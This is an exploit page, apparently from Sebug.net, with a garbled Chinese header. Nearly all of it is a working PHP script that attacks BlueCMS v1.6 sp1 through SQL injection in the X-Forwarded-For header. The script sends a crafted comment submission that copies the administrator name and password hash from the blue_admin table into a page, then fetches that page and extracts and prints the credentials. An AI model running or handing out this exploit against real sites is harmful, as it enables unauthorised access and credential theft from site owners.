BlueCMS v1.6 sp1 $_SERVERע©

Է:

@Sebug.net   dis
վṩ()ܴй,ȫоѧ֮,Ը!1.<?php2.print_r('3.+---------------------------------------------------------------------------+4.BlueCMS v1.6 sp1 Getip() Remote SQL Injection Exploit5.by cnryan6.Mail: cnryan2008[at]gmail[dot]com7.Blog: http://hi.baidu.com/cnryan    8.+---------------------------------------------------------------------------+9.');10.if ($argc < 3) {11.    print_r('12.+---------------------------------------------------------------------------+13.Example:14.php '.$argv[0].' localhost /bluecms/15.+---------------------------------------------------------------------------+16.');17.    exit;18.}19.error_reporting(7);20.ini_set('max_execution_time', 0);21.$host = $argv[1];22.$path = $argv[2];23.send();24.send2();25.function send()26.{27.    global $host, $path;28.    $cmd = "mood=6&comment=test&id=1&type=1&submit=%CC%E1%BD%BB%C6%C0%C2%DB";29.    $getinj=" 00','1'),('','1','0','1','6',(select concat('<u-',admin_name,'-u><p-',pwd,'-p>') from blue_admin),'1281181973','99";30.    $data = "POST ".$path."comment.php?act=send HTTP/1.1\r\n";31.    $data .= "Accept: */*\r\n";32.    $data .= "Accept-Language: zh-cn\r\n";33.    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";34.    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";35.    $data .= "Host: $host\r\n";36.    $data .= "Content-Length: ".strlen($cmd)."\r\n";37.    $data .= "Connection: Close\r\n";38.    $data .= "X-Forwarded-For: $getinj\r\n\r\n";39.    $data .= $cmd;40. 41.    $fp = fsockopen($host, 80);42.    fputs($fp, $data);43. 44.    $resp = '';45. 46.    while ($fp && !feof($fp))47.        $resp .= fread($fp, 1024);48. 49.    return $resp;50.}51. 52.function send2()53.{54.global $host, $path;55.$message="GET ".$path."news.php?id=1 HTTP/1.1\r\n";56.$message.="Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*\r\n";57.$message.="Accept-Language: zh-cn\r\n";58.$message.="Accept-Encoding: gzip, deflate\r\n";59.$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; GreenBrowser)\r\n";60.$message.="Host: $host\r\n";61.$message.="Connection: Keep-Alive\r\n\r\n";62.$fd = fsockopen($host,'80');63.if(!$fd)64.{65.    echo '[-]No response from'.$host;66.    die;67.}68.fputs($fd,$message);69.$resp = '';70.while (!feof($fd)) {71.    $resp.=fgets($fd);72.}73.fclose($fd);74.preg_match_all("/<u-([^<]*)-u><p-([^<]*)-p>/",$resp,$db);75.if($db[1][0]&$db[2][0])76.{77.echo "username->".$db[1][0]."\r\n";78.echo "password->".$db[2][0]."\r\n";79.echo "[+]congratulation ^ ^";80.}else die('[-]exploited fail >"<');81.}82.?>